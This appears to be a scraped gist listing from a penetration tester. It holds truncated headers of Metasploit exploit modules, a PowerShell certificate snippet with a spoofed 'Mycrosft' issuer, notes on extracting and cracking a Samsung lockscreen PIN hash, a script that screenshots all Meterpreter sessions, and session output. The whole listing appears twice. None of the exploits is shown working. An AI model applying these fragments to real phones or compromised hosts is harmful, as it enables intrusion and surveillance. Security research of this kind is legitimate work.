Chris Gates carnal0wnage

## zenoss_graph_pt.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

## nettemp_cmd_exec.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

## shellinabox.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

## simatic_wincc_harvester.rb
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	Rank = ExcellentRanking

## tomcat_mce_upload.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking


## signer.ps1
function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA)
{
	$CAsubject = $certSubject
	$dn = new-object -com 'X509Enrollment.CX500DistinguishedName'
	$dn.Encode( 'CN=' + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
	#Issuer Property for cleanup
	$issuer = 'Mycrosft'
	$issuerdn = new-object -com 'X509Enrollment.CX500DistinguishedName'
	$issuerdn.Encode('CN=' + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
	# Create a new Private Key

## samsung_hash_crack.py
#!/usr/bin/python

'''
Python implementation of passcode hashing algorithm used on the Samsung Galaxy S4 GT-I9505 4.2.2
Correct PIN for hash and salt below is 1234.

Get 40-character hash value in ascii hex format from file /data/system/password.key on the phone

Get salt in signed numeric format by doing sqlite3 query SELECT value FROM locksettings WHERE name = 'lockscreen.password_salt' on /data/system/locksettings.db

## run_meterp_screenshot.rb
<ruby>
framework.sessions.each do |session|
    session.run_cmd("screenshot")
end
</ruby>

## gist:cbe3a4ab1c78d7fbe096
msf > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K        Terminate all sessions
    -c <opt>  Run a command on the session given with -i, or all
    -h        Help banner

## gist:7d068511b8b287942eec
msf post(execute) > sessions -s checkvm
[*] Session 5 (13.37.1.11):
[*] Running script checkvm on meterpreter session 5 (13.37.1.11)
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
[*] Session 6 (13.37.1.11):
[*] Running script checkvm on meterpreter session 6 (13.37.1.11)
[*] Checking if target is a Virtual Machine .....
[*] It appears to be physical host.
[*] Session 7 (13.37.5.10):
	##
	# This file is part of the Metasploit Framework and may be subject to
	# redistribution and commercial restrictions. Please see the Metasploit
	# web site for more information on licensing and terms of use.
	# http://metasploit.com/
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	##
	# This file is part of the Metasploit Framework and may be subject to
	# redistribution and commercial restrictions. Please see the Metasploit
	# Framework web site for more information on licensing and terms of use.
	# http://metasploit.com/framework/
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	##
	# This module requires Metasploit: http//metasploit.com/download
	# Current source: https://github.com/rapid7/metasploit-framework
	##

	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking
	function Invoke-CreateCertificate([string] $certSubject, [bool] $isCA)
	{
	$CAsubject = $certSubject
	$dn = new-object -com 'X509Enrollment.CX500DistinguishedName'
	$dn.Encode( 'CN=' + $CAsubject, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
	#Issuer Property for cleanup
	$issuer = 'Mycrosft'
	$issuerdn = new-object -com 'X509Enrollment.CX500DistinguishedName'
	$issuerdn.Encode('CN=' + $issuer, $dn.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
	# Create a new Private Key
	#!/usr/bin/python

	'''
	Python implementation of passcode hashing algorithm used on the Samsung Galaxy S4 GT-I9505 4.2.2
	Correct PIN for hash and salt below is 1234.

	Get 40-character hash value in ascii hex format from file /data/system/password.key on the phone

	Get salt in signed numeric format by doing sqlite3 query SELECT value FROM locksettings WHERE name = 'lockscreen.password_salt' on /data/system/locksettings.db
	<ruby>
	framework.sessions.each do \|session\|
	session.run_cmd("screenshot")
	end
	</ruby>
	msf > sessions -h
	Usage: sessions [options]

	Active session manipulation and interaction.

	OPTIONS:

	-K Terminate all sessions
	-c <opt> Run a command on the session given with -i, or all
	-h Help banner
	msf post(execute) > sessions -s checkvm
	[*] Session 5 (13.37.1.11):
	[*] Running script checkvm on meterpreter session 5 (13.37.1.11)
	[*] Checking if target is a Virtual Machine .....
	[*] It appears to be physical host.
	[*] Session 6 (13.37.1.11):
	[*] Running script checkvm on meterpreter session 6 (13.37.1.11)
	[*] Checking if target is a Virtual Machine .....
	[*] It appears to be physical host.
	[*] Session 7 (13.37.5.10):